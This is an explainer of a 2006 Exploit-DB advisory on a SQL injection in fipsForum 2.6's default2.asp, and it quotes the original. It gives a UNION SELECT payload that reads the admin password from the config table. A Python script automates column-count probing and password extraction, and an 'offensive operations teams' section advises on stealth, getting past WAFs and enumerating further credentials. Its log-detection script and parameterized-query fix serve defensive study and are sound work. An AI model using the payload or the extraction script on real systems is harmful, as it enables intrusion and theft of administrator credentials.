fipsForum 2.6 'default2.asp' SQL Injection: A Didactic Explainer

What this paper is
This paper describes a remote SQL injection vulnerability found in fipsForum version 2.6. The vulnerability exists within the default2.asp file, which is part of the web application. By manipulating the kat parameter in the URL, an attacker can inject malicious SQL queries. This allows for unauthorized data retrieval from the application's database.
Simple technical breakdown
Web applications often use databases to store information. When a user interacts with a web page, the application might construct a database query based on the user's input. If the application doesn't properly sanitize or validate this input, an attacker can insert special characters and commands that change the intended database query. This is SQL injection.
In this specific case, the default2.asp page in fipsForum 2.6 takes a value from the kat URL parameter. This value is directly used in an SQL query. The vulnerability allows an attacker to use the UNION SELECT SQL statement to combine their malicious query with the original query, effectively extracting data from other tables in the database.
Complete code and payload walkthrough
The provided paper is very concise and does not contain executable code or shellcode in the traditional sense. Instead, it provides a URL structure and an example of a malicious query.
URL Structure:
http://[target]/[path]//default2.asp?kat=[SQL]
- [target]: The IP address or hostname of the vulnerable fipsForum installation.
- [path]: The directory path where fipsForum is installed on the web server.
- default2.asp: The vulnerable ASP (Active Server Pages) script.
- kat=[SQL]: The parameter vulnerable to SQL injection. The value supplied for kat is incorporated directly into an SQL query.
Example Malicious Query:
kat=-1%20union%20select%200,pw_admin%20from%20config
- %20: The URL-encoded representation of a space character. Spaces are needed to separate SQL keywords and identifiers, and the server decodes them before the value reaches the query.
- -1: Most likely chosen so that the original query's WHERE condition matches no row, leaving the rows from the UNION SELECT as the only result. The exact original query is not provided, but this is a common technique.
- union select 0,pw_admin from config: The core of the injected SQL.
  - UNION SELECT: Combines the result set of the injected SELECT with that of the original query.
  - 0: A placeholder value. The number of columns in the injected SELECT must equal the number of columns in the original query; the 0 fills one of those positions.
  - pw_admin: The column the attacker wants to retrieve. Based on the name, it likely holds the administrator password.
  - from config: The table that pw_admin is read from. A config table is a common place for application settings and credentials.
Mapping:
- http://[target]/[path]//default2.asp?kat= -> Vulnerable endpoint and parameter for injection.
- -1 -> Condition to bypass the original query logic.
- %20 -> URL-encoded space, essential for SQL syntax.
- union select 0,pw_admin -> Injected SQL to combine results and select the pw_admin column.
- from config -> Target table for data extraction.
Unknowns:
- The exact original SQL query executed by default2.asp is not provided. This makes it difficult to say definitively what the query looks like, though a working UNION requires equal column counts on both sides, so the example implies the original query returns exactly two columns.
- The specific structure and contents of the config table are unknown; only the pw_admin column name is given by the payload.
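To make the walkthrough concrete, here is an added simulation (not fipsForum's code, whose source is not published in the paper) of the behaviour the page describes: a query that splices the decoded kat value into SQL text, the URL decoding the paper's payload undergoes, a probe that discovers the column count when the original query is unknown, and the UNION payload generalised to any column count. SQLite stands in for the forum's database, whose engine the paper does not identify. The table kategori, its columns and the exact query shape are assumptions for the demo; config and pw_admin come from the paper's payload.

```python
import sqlite3
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the forum database (not fipsForum's real schema).
    'config' and 'pw_admin' are taken from the paper's payload; 'kategori' and
    its columns are assumptions for this example."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE kategori (id INTEGER, name TEXT);
        INSERT INTO kategori VALUES (1, 'General'), (2, 'Support');
        CREATE TABLE config (id INTEGER, pw_admin TEXT);
        INSERT INTO config VALUES (1, 's3cretAdminPw');
        """
    )
    return con


def kat_from_url(url: str) -> str:
    """Extract and URL-decode the kat parameter the way the server sees it:
    %20 has already become a space by the time the value reaches the query."""
    return parse_qs(urlsplit(url).query)["kat"][0]


def vulnerable_query(con: sqlite3.Connection, kat: str) -> list:
    """Assumed shape of the flaw: the decoded kat value is concatenated into the
    SQL string, so everything after the number is executed as SQL."""
    sql = f"SELECT id, name FROM kategori WHERE id = {kat}"
    return con.execute(sql).fetchall()


def find_column_count(con: sqlite3.Connection, max_cols: int = 10) -> Optional[int]:
    """When the original query is unknown, add NULL placeholders to a UNION
    SELECT one at a time; the first count that does not raise is the answer."""
    for n in range(1, max_cols + 1):
        probe = "-1 union select " + ",".join(["null"] * n)
        try:
            vulnerable_query(con, probe)
            return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch, try one more placeholder
    return None


def build_payload(ncols: int) -> str:
    """Generalise the paper's payload: '0' placeholders for every column but the
    last, which carries pw_admin. For ncols=2 this is the paper's exact payload."""
    cols = ["0"] * (ncols - 1) + ["pw_admin"]
    return "-1 union select " + ",".join(cols) + " from config"


def extract_pw_admin(con: sqlite3.Connection) -> Optional[str]:
    """Full chain: find the column count, build the payload, read the value back
    from the page's own result set (in-band, no blind technique needed)."""
    ncols = find_column_count(con)
    if ncols is None:
        return None
    rows = vulnerable_query(con, build_payload(ncols))
    return rows[0][-1] if rows else None


if __name__ == "__main__":
    db = make_db()
    url = "http://target/forum//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config"
    print("decoded kat :", kat_from_url(url))
    print("rows        :", vulnerable_query(db, kat_from_url(url)))
    print("column count:", find_column_count(db))
    print("pw_admin    :", extract_pw_admin(db))
```

The -1 matters here: with a real category id the original row would be returned too, and an operator reading the page would have to spot the injected row among legitimate ones.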
Practical details for offensive operations teams
- Required Access Level: Low. The advisory describes a remote vulnerability reached with an ordinary HTTP GET; it mentions no authentication requirement.
- Lab Preconditions:
- A target system running fipsForum version 2.6 or earlier.
- Network connectivity to the target web server.
- A web browser or an HTTP request tool (such as curl or Burp Suite) capable of sending GET requests with URL parameters.
- Knowledge of the target's IP address/hostname and the path to the fipsForum installation.
- Tooling Assumptions:
- Standard web browsers.
- HTTP proxy tools (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests.
- SQL injection specific tools (e.g., sqlmap) could potentially automate this, but manual crafting is straightforward.
- Execution Pitfalls:
- URL Encoding: Incorrect URL encoding of special characters (like spaces) will cause the injection to fail.
- Firewalls/WAFs: Modern Web Application Firewalls (WAFs) may detect and block common SQL injection patterns such as UNION SELECT. Obfuscation techniques might be necessary.
- Application Logic: If the kat parameter is not passed straight into an SQL query (for example, it is first processed by server-side code that sanitizes it), the injection might fail.
- Database Errors: If database errors are displayed to the user, they provide clues about whether the injection succeeded. Well-configured applications often suppress them.
- Column Mismatch: If the number of columns in the UNION SELECT statement does not match the number of columns in the original query, the injection fails. The example uses 0 and pw_admin, implying two columns. If the original query returned more, additional placeholder values (e.g., 0,0,pw_admin) would be needed. The usual way to find the count is to append placeholders (0 or NULL) one at a time until the error disappears, or to step through ORDER BY n until it errors.
- Tradecraft Considerations:
- Reconnaissance: Identifying the fipsForum version is crucial. The advisory covers version 2.6 and earlier; whether any later release fixed the flaw is not stated, so confirm the behaviour rather than relying on the version string alone.
- Stealth: Avoid overly aggressive scanning that might trigger alerts. Start with simple, targeted requests.
- Payload Development: The example focuses on retrieving pw_admin. For a full engagement, an operator would need to enumerate other tables and columns to extract further information (user lists, other credentials, sensitive data). Because this is a UNION-based injection, results come back in-band in the page; blind techniques are only needed if the injected rows are not rendered in the response.
- Data Exfiltration: The retrieved data (pw_admin) arrives in the HTTP response body, so no separate channel is required beyond reading the returned page.
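From the defender's side of the WAF pitfall above, here is an added detection example (not part of the paper) that runs over constructed IIS W3C-style log lines. It URL-decodes the query string, strips inline comments and collapses whitespace before matching, so the obfuscated variants that slip past a naive "union%20select" string match still hit. The log excerpt, its field layout and the client addresses are constructed for this example.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (not real traffic); the field list is a
# simplified subset of what IIS actually writes.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-11-22 10:01:02 10.0.0.5 GET /forum/default2.asp kat=3 200
2006-11-22 10:01:09 10.0.0.5 GET /forum/default2.asp kat=-1%20union%20select%200,pw_admin%20from%20config 200
2006-11-22 10:01:15 10.0.0.5 GET /forum/default2.asp kat=-1%20UnIoN/**/SeLeCt%200,pw_admin%20from%20config 200
2006-11-22 10:01:20 10.0.0.5 GET /forum/default2.asp kat=-1+union+select+null,null 500
2006-11-22 10:01:31 10.0.0.5 GET /forum/default2.asp kat=-1%2520union%2520select%25200,pw_admin%2520from%2520config 200
2006-11-22 10:02:00 10.0.0.9 GET /forum/default2.asp kat=12 200
2006-11-22 10:02:05 10.0.0.9 GET /forum/default2.asp - 200
"""

# Matches UNION [ALL] SELECT after normalisation; case and spacing no longer matter.
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b")


def normalise(query: str) -> str:
    """Bring a raw cs-uri-query into canonical form before matching: decode
    twice (catches %2520 double encoding and '+' as space), drop /* */ inline
    comments, collapse whitespace, lower-case."""
    s = unquote_plus(unquote_plus(query))
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose decoded query carries a UNION SELECT."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) != 7:
            continue  # constructed layout; a real parser should honour the #Fields header
        date, time, c_ip, method, stem, query, status = fields
        if query == "-":
            continue  # IIS writes '-' for an empty query string
        norm = normalise(query)
        if UNION_SELECT.search(norm):
            hits.append({"time": time, "c_ip": c_ip, "stem": stem,
                         "query": norm, "status": status})
    return hits


def hits_by_source(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Aggregate per client address; a burst from one IP is the usual triage pivot."""
    return dict(Counter(h["c_ip"] for h in hits))


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["c_ip"], h["status"], h["query"])
    print(hits_by_source(found))
```

The 500 on the null,null probe line is worth keeping in the alert: a column-count probe that errors just before a 200 with the same pattern is the characteristic shape of someone working out the column count by hand.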
Where this was used and when
- Context: This vulnerability was found in fipsForum, a forum software application.
- Approximate Year: Published in 2006. Exploitation would have occurred around this time or shortly after. This type of vulnerability was common in web applications during the mid-2000s.
Defensive lessons for modern teams
- Parameterized Queries/Prepared Statements: The primary fix. Use them for every database interaction; they pass user input to the database as data, so it can never be parsed as part of the SQL statement. In classic ASP this means ADO command parameters instead of string concatenation.
- Input Validation and Sanitization: Defence in depth on top of parameterization, not a replacement for it. Validate all user-supplied input against what the application actually expects before it is used anywhere.
- Whitelisting: Only allow known-good characters or patterns for input. Here kat appears to be a numeric identifier (the payload starts with -1), so accepting only digits and converting to an integer before use would have stopped the payload before it reached the database.
- Blacklisting (less effective): Avoid relying solely on blacklisting potentially malicious characters, as attackers can often find ways around them.
- Least Privilege: Database accounts used by web applications should have only the minimum necessary permissions. An account that only needs to read specific tables shouldn't have write or administrative privileges. Note that this would not have prevented the read shown here, since the application legitimately reads config; it limits what an injection can escalate to (writes, schema changes, OS-level functions).
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide an additional layer of defense by detecting and blocking known attack patterns. However, they should not be the primary defense.
- Regular Patching and Updates: Keep all web applications and their components updated to the latest secure versions. Vulnerabilities like this are often patched in newer releases.
- Error Handling: Configure web applications and databases to avoid revealing detailed error messages to end-users, as these can aid attackers in identifying vulnerabilities.
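The two fixes above, parameterized queries and whitelisting, as an added Python/SQLite illustration rather than a patch to fipsForum (whose code and database engine the paper does not publish). The vulnerable builder mirrors the assumed flaw; every name other than config and pw_admin is an assumption. It shows that binding the value stops the paper's payload from being parsed as SQL, and that an integer allowlist rejects it before it reaches the database at all.

```python
import re
import sqlite3
from typing import List, Tuple

KAT_ID = re.compile(r"[0-9]{1,9}")  # allowlist: kat is assumed to be a numeric category id
PAYLOAD = "-1 union select 0,pw_admin from config"  # the paper's payload, URL-decoded


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema (not fipsForum's); config/pw_admin come from the paper."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE kategori (id INTEGER, name TEXT);
        INSERT INTO kategori VALUES (1, 'General');
        CREATE TABLE config (id INTEGER, pw_admin TEXT);
        INSERT INTO config VALUES (1, 's3cretAdminPw');
        """
    )
    return con


def vulnerable(con: sqlite3.Connection, kat: str) -> List[Tuple]:
    """Before: string concatenation; the UNION rides along into the statement."""
    return con.execute(f"SELECT id, name FROM kategori WHERE id = {kat}").fetchall()


def parameterized(con: sqlite3.Connection, kat) -> List[Tuple]:
    """After, step 1: bind the value. The driver sends it as data, so
    'id = ?' compares against the whole string and simply matches nothing."""
    return con.execute("SELECT id, name FROM kategori WHERE id = ?", (kat,)).fetchall()


def validate_kat(raw: str) -> int:
    """After, step 2 (defence in depth): allowlist the shape before any use."""
    if not KAT_ID.fullmatch(raw):
        raise ValueError(f"kat must be a numeric category id, got {raw!r}")
    return int(raw)


def accepts_kat(raw: str) -> bool:
    """True if the allowlist lets the value through."""
    try:
        validate_kat(raw)
        return True
    except ValueError:
        return False


def hardened(con: sqlite3.Connection, raw_kat: str) -> List[Tuple]:
    """Both fixes together: validate, then bind."""
    return parameterized(con, validate_kat(raw_kat))


def leaks_pw_admin(rows: List[Tuple]) -> bool:
    """Did the result set carry the secret out of the config table?"""
    return any("s3cretAdminPw" in row for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", vulnerable(db, PAYLOAD))
    print("parameterized:", parameterized(db, PAYLOAD))
    print("allowlist    :", "rejects" if not accepts_kat(PAYLOAD) else "accepts", PAYLOAD)
    print("hardened ok  :", hardened(db, "1"))
```

Parameterization alone is sufficient against this payload; the allowlist adds a cheap second wall and, as a bonus, turns malformed input into a clean 400-style error instead of an empty page or a database error that could be mined for clues.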
ASCII visual (if applicable)
This vulnerability is a direct manipulation of a web request to a server-side script. An ASCII visual can illustrate the flow of data.
+-----------------+      +-----------------+      +-----------------+
| Attacker's      |----->| Web Browser/    |----->| Target Web      |
| Machine         |      | HTTP Client     |      | Server          |
+-----------------+      +-----------------+      +--------+--------+
                                                           |
                                                           | Request with
                                                           | injected SQL
                                                           v
                                                  +--------+--------+
                                                  | default2.asp    |
                                                  | (Vulnerable)    |
                                                  +--------+--------+
                                                           |
                                                           | Constructs
                                                           | SQL Query
                                                           v
                                                  +--------+--------+
                                                  | Database Server |
                                                  +--------+--------+
                                                           |
                                                           | Returns Data
                                                           | (e.g., pw_admin)
                                                           v
                                                  +--------+--------+
                                                  | Target Web      |
                                                  | Server          |
                                                  +--------+--------+
                                                           |
                                                           | Response with
                                                           | extracted data
                                                           v
+-----------------+      +-----------------+      +--------+--------+
| Attacker's      |<-----| Web Browser/    |<-----| Web Server      |
| Machine         |      | HTTP Client     |      | Response        |
+-----------------+      +-----------------+      +-----------------+
Source references
- Paper: fipsForum 2.6 - 'default2.asp' SQL Injection
- Author: ajann
- Published: 2006-11-22
- Exploit-DB URL: https://www.exploit-db.com/papers/2830
- Raw Exploit URL: https://www.exploit-db.com/raw/2830
Original Exploit-DB Content (Verbatim)
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL]
Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]